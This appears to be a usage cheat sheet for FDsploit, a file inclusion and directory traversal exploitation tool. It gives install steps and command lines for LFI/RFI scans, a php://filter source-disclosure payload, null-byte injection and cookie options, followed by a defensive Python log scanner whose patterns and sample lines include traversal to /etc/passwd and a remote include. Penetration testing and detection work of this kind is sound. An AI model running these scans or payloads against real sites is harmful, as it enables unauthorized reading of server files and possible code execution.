Description
FDsploit is a file inclusion and directory traversal exploitation tool. It automates LFI/RFI scanning, supports multiple encoding/filter bypass methods, and can escalate LFI to remote code execution through log poisoning and PHP filter chains.
Installation
BASH
git clone https://github.com/chrispetrou/FDsploit.git
cd FDsploit
pip3 install -r requirements.txt
Basic Usage
BASH
# LFI scan
python3 fdsploit.py -u "https://target.com/page?file=INJECT" -t lfi
# Directory traversal scan
python3 fdsploit.py -u "https://target.com/page?path=INJECT" -t dt
# RFI scan
python3 fdsploit.py -u "https://target.com/page?file=INJECT" -t rfi
Advanced Usage
BASH
# Custom depth
python3 fdsploit.py -u "https://target.com/page?file=INJECT" -t lfi -d 10
# PHP filter wrapper (source is returned base64-encoded)
python3 fdsploit.py -u "https://target.com/page?file=INJECT" -t lfi --filter
# Null byte injection
python3 fdsploit.py -u "https://target.com/page?file=INJECT" -t lfi --null
# Custom cookies
python3 fdsploit.py -u "https://target.com/page?file=INJECT" -t lfi -c "session=abc"
Common Workflows
BASH
# Test file parameter for LFI
python3 fdsploit.py -u "https://target.com/view?file=INJECT" -t lfi -d 8
# PHP filter chain for source code disclosure
# php://filter/convert.base64-encode/resource=index.php
python3 fdsploit.py -u "https://target.com/view?file=INJECT" -t lfi --filter
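Detection side of the scans above, as an added example that is not part of FDsploit or the original page: a Python check that flags the request shapes these options produce (traversal sequences, php:// style wrappers, null bytes, remote URLs) in access-log lines, decoding repeatedly so double URL-encoding does not hide them. The log lines, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 "GET /view?file=about.html HTTP/1.1" 200',
    '203.0.113.5 "GET /view?file=../../../../etc/passwd HTTP/1.1" 200',
    '203.0.113.5 "GET /view?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200',
    '203.0.113.5 "GET /view?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200',
    '203.0.113.5 "GET /view?file=../../etc/passwd%00.png HTTP/1.1" 200',
    '203.0.113.5 "GET /view?file=http://198.51.100.7/x.txt HTTP/1.1" 200',
]

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/')
# A ".." path segment: bounded by a slash/backslash or the string edge on both sides.
DOTDOT = re.compile(r"(?<![^\\/])\.\.(?![^\\/])")
RULES = [
    ("traversal", DOTDOT),
    ("php_wrapper", re.compile(r"\b(?:php|data|expect|phar|zip)://", re.I)),
    ("null_byte", re.compile(r"\x00")),
    ("remote_url", re.compile(r"^(?:https?|ftp)://", re.I)),
]

def full_decode(value, max_rounds=5):
    """URL-decode until the value stops changing (handles %252e-style nesting)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_depth(value):
    """Number of '..' segments, i.e. how many directories the path climbs."""
    return len(DOTDOT.findall(full_decode(value)))

def classify(line):
    """Return the sorted rule names matched by any query parameter in the line."""
    m = REQUEST.search(line)
    if not m:
        return []
    hits = set()
    for _, raw in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        value = full_decode(raw)
        hits.update(name for name, rx in RULES if rx.search(value))
    return sorted(hits)

def scan(lines):
    """Return (index, tags) for every line that matched at least one rule."""
    return [(i, tags) for i, line in enumerate(lines) if (tags := classify(line))]
```

A match here shows that a request was attempted, not that the include succeeded; pair it with response size or status for triage.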